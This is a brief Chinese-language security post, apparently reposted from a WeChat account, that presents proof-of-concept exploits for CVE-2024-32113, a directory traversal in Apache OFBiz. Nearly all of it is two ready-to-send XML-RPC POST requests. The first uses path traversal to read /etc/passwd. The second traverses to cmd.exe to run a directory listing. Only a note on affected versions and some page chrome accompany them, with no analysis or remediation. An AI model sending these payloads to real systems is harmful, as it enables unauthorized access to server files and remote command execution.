01—
CVE-2024-32113
POC:
Poc-1
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<
methodCall
>
<
methodName
>
example.createBlogPost
</
methodName
>
<
params
>
<
param
>
<
value
>
<
string
>
../../../../../../etc/passwd
</
string
>
</
value
>
</
param
>
</
params
>
</
methodCall
>
Poc-2
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<
methodCall
>
<
methodName
>
performCommand
</
methodName
>
<
params
>
<
param
>
<
value
>
<
string
>
../../../../../../windows/system32/cmd.exe?/c+dir+c:
</
string
>
</
value
>
</
param
>
</
params
>
</
methodCall
>
影响版本:Version: below
<
=18.12.12
原文链接:
原文始发于微信公众号(道玄网安驿站):Apache OFBiz 目录遍历致代码执行漏洞(CVE-2024-32113)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论